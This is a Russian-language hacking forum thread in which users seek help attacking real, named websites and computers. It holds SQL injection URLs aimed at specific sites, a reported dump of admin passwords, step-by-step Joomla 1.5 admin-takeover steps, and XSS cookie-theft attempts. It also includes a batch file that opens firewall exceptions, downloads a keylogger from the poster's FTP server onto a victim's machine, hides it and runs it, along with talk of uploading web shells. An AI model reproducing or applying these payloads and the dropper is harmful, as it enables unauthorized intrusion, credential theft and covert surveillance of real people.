Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    http://theictect.com/rss/daily_deal.php?c=3
    вот blind inj, база mysql, в information_schema нет таблиц с юзерами, подскажите что делать? помимо inf_sch присутствуют, еще 3 базы но там тыкать бесполезно.
     
    #15561 Lijzer, 11 Dec 2010
    Last edited: 11 Dec 2010
  2. Yellow

    Yellow Banned

    Joined:
    9 Dec 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0

    Ищи SQL в другом месте , часто бывает , что у тебя прав нету это как вариант
     
  3. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    ykktbltrn'0
    wkpfx}q|e+6

    Что это может быть за хешь?
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 people like this.
  5. Lijzer

    Lijzer Member

    Joined:
    5 Nov 2010
    Messages:
    92
    Likes Received:
    8
    Reputations:
    4
    Выдрал с 2ой базы логины и пассы 4 админов, теперь ищу админку.
     
  6. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Lijzer
    http://zoupon.com.au/admin/
    не оно?
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ну и где твой вопрос по уязвимостям? модеры потрите этот бред школьника и флуд..мой пост тоже под удаление..
     
    1 person likes this.
  8. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    http://iatp.md/index.php?what=nav&id=-1+union+select+1,convert(version()+using+latin1),3+into+outfile+ae.txt--

    подскажите пожалуйста что тут не то?
     
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    во первых ты должен указать полный путь к файлу, во вторых ты должен взять его в кавычки, в третих у тебя нет прав на чтение/запись файлов
     
    _________________________
    3 people like this.
  10. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
    так в этом и проблема....кавычки. не если нет прав ладно. спасибо!
     
  11. wizzardl

    wizzardl New Member

    Joined:
    13 May 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    joomla 1.5 exploit
    1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm

    2. Write into field "token" char ' and Click OK.

    3. Write new password for admin

    4. Go to url : target.com/administrator/

    5. Login admin with new password


    во время входа мне выдает ошибку неверный логин ???
     
  12. Mirrey

    Mirrey New Member

    Joined:
    10 Sep 2010
    Messages:
    35
    Likes Received:
    1
    Reputations:
    0
    Нашел xss, выполняю:
    В алетре только половина кукав... И этого не достаточно что бы украсть сессию. В чем может быть проблема?
     
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Наверное, некоторые куки недоступны для javascriptа, то есть они с флагом HTTP-Only
     
    2 people like this.
  14. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19

    Значит уязвимость исправлена.
     
  15. Darklamar

    Darklamar New Member

    Joined:
    11 Dec 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Столкнулся с такой проблемой. Создал батник install.bat
    Code:
    MKDIR C:\hc
    netsh firewall add allowedprogram C:\install.bat "DownloaderFTP" enable
    echo download >key.txt
    echo download >>key.txt
    echo get inst_jasp.exe C:\hc\inst_jasp.exe >>key.txt
    echo bye >>key.txt
    ftp -s:C:\key.txt "ИП АДРЕС ФТП" 
    netsh firewall add allowedprogram C:\hc\inst_jasp.exe "Blaze" enable 
    attrib "C:\hc" +h 
    start C:\hc\inst_jasp.exe 
    del key.txt 
    del install.bat
    
    Батник закачивает на комп жертвы кейлоггер с моего фтп. Если я запускаю у себя, то все норм, логи идут. А если на удаленном компе через cmd, то никаких логов нет =(
    Проверил, файл на комп закачивает и вроде выполняет. Но, почему-то логов нет.
     
  16. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    ANTIVIRUS+FIREWALL
     
  17. Darklamar

    Darklamar New Member

    Joined:
    11 Dec 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Антивира у него нету, фаерволла тоже (кроме стандартного, но в батнике просаны исключения)
     
  18. MikePro

    MikePro New Member

    Joined:
    29 Jan 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Подскажите пожалуйста как создать shell и как им пользоватся
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ну дорогой задал ты вопрос, шелл что бы создать надо в пхп или в другом веб языке шарить, но я подозреваю что тебя интересует как залить шелл (аплоад на сервер)..для этого прочитай -ка сначала все маны по багам на ачате, но остановись на скулях поболее.и через пару эдак месяцев если понятливый будешь , то узнаешь что такое шелл и с чем его едят..а пока кури маны..
     
    1 person likes this.
  20. Darklamar

    Darklamar New Member

    Joined:
    11 Dec 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Скинул ссылку на один шелл в пм. По теме: тебе необходимо его залить на удаленный сервер, а для этого ищи уязвимости.
     
Thread Status:
Not open for further replies.